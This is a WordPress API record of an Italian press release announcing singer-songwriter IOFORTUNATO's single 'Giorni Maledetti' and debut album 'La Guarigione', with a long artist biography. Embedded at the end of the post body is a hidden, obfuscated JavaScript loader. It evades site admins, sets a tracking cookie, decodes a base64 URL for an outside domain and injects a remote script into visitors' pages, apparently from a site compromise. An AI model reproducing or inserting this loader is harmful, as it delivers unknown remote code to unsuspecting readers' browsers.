{"id":39738,"date":"2023-04-11T19:29:40","date_gmt":"2023-04-11T19:29:40","guid":{"rendered":"https:\/\/www.radioempire.it\/?p=39738"},"modified":"2026-02-24T23:04:13","modified_gmt":"2026-02-24T23:04:13","slug":"iofortunato-oggi-esce-in-digitale-e-in-radio-il-singolo-giorni-maledetti-che-anticipa-lalbum-desordio-in-uscita-il-27-aprile-dal-titolo-la-guarigion","status":"publish","type":"post","link":"https:\/\/www.radioempire.it\/index.php\/2023\/04\/11\/iofortunato-oggi-esce-in-digitale-e-in-radio-il-singolo-giorni-maledetti-che-anticipa-lalbum-desordio-in-uscita-il-27-aprile-dal-titolo-la-guarigion\/","title":{"rendered":"IOFORTUNATO  Oggi esce in digitale e in radio il singolo  \u201cGiorni Maledetti\u201d,  che anticipa l\u2019album d\u2019esordio, in uscita il 27 aprile, dal titolo  \u201cLa Guarigione\u201d."},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><strong>Il nuovo progetto discografico sar\u00e0 presentato al pubblico il <\/strong><\/p>\n<p><strong>4 maggio con un concerto a I Candelai di Palermo.<\/strong><\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p>Oggi esce in digitale e in radio<strong><em>\u201cGiorni Maledetti\u201d,<\/em><\/strong> singolo che anticipa l\u2019album d\u2019esordio, dal titolo <strong><em>\u201cLa Guarigione\u201d<\/em><\/strong> (in uscita il 27 aprile) del cantautore palermitano<strong> IOFORTUNATO<\/strong>.Il nuovo progetto discografico sar\u00e0 presentato al pubblico il <strong>4 maggio con un concerto a I Candelai di Palermo<\/strong> (ore 21.00 \u2013 ingresso gratuito), in apertura al live delle Cordepazze.<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/open.spotify.com\/album\/6XZrPhoGP43mQUXhEBeLQB\"><strong>ASCOLTA BRANO<\/strong><\/a><\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><strong><em>\u201cGiorni Maledetti\u201d<\/em><\/strong>\u00e8 una canzone nata attraverso varie metamorfosi<em>: \u201calla fine liberata da quei veli che ho messo sopra per attenuare il dolore<\/em> \u2013 <strong>racconta IOFORTUNATO<\/strong> &#8211; <em>i giorni maledetti mi affondano e mi salvano allo stesso tempo, mi feriscono e poi mi curano, mi abbandonano alla solitudine e mi regalano appigli per rialzarmi.Non \u00e8 vero che resta un vuoto dopo il distacco. Nei ricordi e in ci\u00f2 che \u00e8 rimasto si pu\u00f2 costruire un senso nuovo, per cicatrizzare la ferita e riprendere a camminare.\u201d<\/em><\/p>\n<p>Il brano, testo e musica di Fabrizio Fortunato, la produzione artistica \u00e8 a cura di Roberto Cammarata, \u00e8 estratto da <strong><em>\u201cLa Guarigione\u201d: \u201c<\/em><\/strong><em>l\u2019amore \u00e8 il sentimento su cui regge l\u2019intero lavoro, la guarigione stessa e attraversa le delusioni, la rabbia, il dolore, la paura. Guarire vuol dire integrare le ferite della vita, ritornare nei luoghi passati, riviverli attraverso gli odori trovando qualcosa di nuovo, di salvato\u201d.<\/em><\/p>\n<p><strong><img loading=\"lazy\" class=\"size-medium wp-image-39739 alignleft\" src=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2023\/04\/IOFORTUNATO-FOTO-2-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2023\/04\/IOFORTUNATO-FOTO-2-300x169.jpg 300w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2023\/04\/IOFORTUNATO-FOTO-2-1024x576.jpg 1024w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2023\/04\/IOFORTUNATO-FOTO-2-768x432.jpg 768w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2023\/04\/IOFORTUNATO-FOTO-2.jpg 1500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>IOFORTUNATO<\/strong> \u00e8 il progetto musicale solista di <strong>Fabrizio Fortunato<\/strong>.Fabrizio Fortunato comincia ad esibirsi nell\u2019hinterland palermitano intorno al 2008con diverse piccole realt\u00e0 musical.Tra il 2011 e il 2015 fonda insieme a Daniele Lo Coco, Valerio Ragusa e DanieleSchillaci i <strong>Cum Moenia<\/strong>, band di musica strumentale che lo vede dietro ai Synth e ilpianoforte.Con i Cum Moenia pubblica un mini-Ep<strong><em>Dal Numero alla Forma<\/em><\/strong> (NostressNetlabel,2012) e un Lp<strong><em>Yersinia<\/em><\/strong> (Inusiterecords, 2015).Parallelamente tra il 2013 e il 2015 entra a far parte dei <strong>Dryleaf,<\/strong> duo elettrofolk dovesi occupa dell\u2019elettronica (synth, sequenzer, drum machine) e con il quale pubblical\u2019Ep<strong><em>Backgrounds vol 2<\/em><\/strong> (2016) e l\u2019Lp<strong><em>An InvisibleUs<\/em><\/strong> (2017).Con i Cum Moenia e i Dryleaf suona in giro per la Sicilia, partecipando a festivalcome <strong>BeatfullFest<\/strong>(CumMoenia, 2014); <strong>Opentrip1maggio <\/strong>(CumMoenia, 2012);<strong>Italiawave<\/strong> (Dryleaf,2015); <strong>Tourtheforst<\/strong> (CumMoenia, 2012).Nel 2015 arriva l\u2019incontro con Salvo Cascio con cui fonda <strong>Yes\/se:f<\/strong> e con il qualearrangia alcune delle canzoni scritte negli ultimi anni, tenute nel cassetto sino adallora.Infatti, dopo un inizio pi\u00f9 incentrato su brani strumentali prevalentementeelettronici, racchiusi nel primo mini-Ep<strong><em>ThiIsNotTheAlbum<\/em><\/strong> (Autoproduzione, 2015),pubblicano l\u2019Lp<strong><em>Prima del Sonno<\/em><\/strong>(Dancetoolrecords, 2017), che contiene molte delle canzoni sopracitate e tra le quali spicca <strong><em>Mine Vaganti<\/em><\/strong>,singolo uscito in esclusiva su <strong>Rolling StoneItalia <\/strong>il 1 dicembre 2017.Nel 2019 sempre con Yes\/se:f pubblica <strong><em>Provare<\/em><\/strong>, canzone dal carattere fortementeIndie con un piglio diverso dalle canzoni appartenenti al disco precedente.Nello stesso anno Yes\/se:f si scioglie e termina il lavoro fatto fino a quel momento.Nel 2020, durante il primo lockdown pandemico, Fabrizio Fortunato scrive alcunecanzoni che preproduce in una stanza di casa adibita a studio che con l\u2019aiuto virtualee in remoto di <strong>Daniele Stagno<\/strong> (Not a sad story),scolpisce ancor di pi\u00f9 da un punto di vista stilistico.Nel luglio 2020 l\u2019incontro provvidenziale e necessario con <strong>Roberto Cammarata<\/strong>(Lrdl,Omosumo,Cordepazze, Not A Sad Story) dona vita e colori allecanzoni scritte in casa, ne nascono nuove e cos\u00ec si avvia la vera e propria produzionedel primo disco di <strong>IOFORTUNATO<\/strong>che vedr\u00e0 la sua uscita nel 2023.L\u201911 maggio 2022 esce il primo singolo <strong><em>CNC<\/em><\/strong>, distribuito da TuneCore e presente sututte le piattaforme streaming e tutti gli store digitali. Il 27 luglio 2022 esce sulcanale YouTube personale di IOFORTUNATO una live session acustica di CNC,eseguita insieme al maestro Francesco Incandela (Francesco Incandela;Cordepazze)al violino.Il 19 ottobre 2022 esce il secondo singolo <strong><em>Cappotto Verde<\/em><\/strong> e nell\u2019Aprile 2023 uscir\u00e0l\u2019ultimo singolo Giorni Maledetti che anticipa il disco La Guarigione in uscita nellostesso mese.<\/p>\n<p>&nbsp;<\/p>\n<p>IG: <a href=\"https:\/\/www.instagram.com\/iofortunato\/\">https:\/\/www.instagram.com\/iofortunato\/<\/a><\/p>\n<p>YT: <a href=\"https:\/\/www.youtube.com\/@iofortunato2831\">https:\/\/www.youtube.com\/@iofortunato2831<\/a><\/p>\n<p>Palermo, 11 aprile 2023<\/p>\n<p>Resp Comunicazione: Gabriele Lo Piccolo \u2013 <a href=\"mailto:info@gabrielelopiccolo.it\">info@gabrielelopiccolo.it<\/a> &#8211; 3204424268<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Il nuovo progetto discografico sar\u00e0 presentato al pubblico il 4 maggio con un concerto a I Candelai di Palermo. \u00a0 Oggi esce in digitale e in radio\u201cGiorni Maledetti\u201d, singolo<\/p>\n<div><a class=\"permalink\" href=\"https:\/\/www.radioempire.it\/index.php\/2023\/04\/11\/iofortunato-oggi-esce-in-digitale-e-in-radio-il-singolo-giorni-maledetti-che-anticipa-lalbum-desordio-in-uscita-il-27-aprile-dal-titolo-la-guarigion\/\">Read More&#8230;<\/a><\/div>\n","protected":false},"author":2,"featured_media":39740,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[36,78],"tags":[],"_links":{"self":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/39738"}],"collection":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/comments?post=39738"}],"version-history":[{"count":2,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/39738\/revisions"}],"predecessor-version":[{"id":57400,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/39738\/revisions\/57400"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media\/39740"}],"wp:attachment":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media?parent=39738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/categories?post=39738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/tags?post=39738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}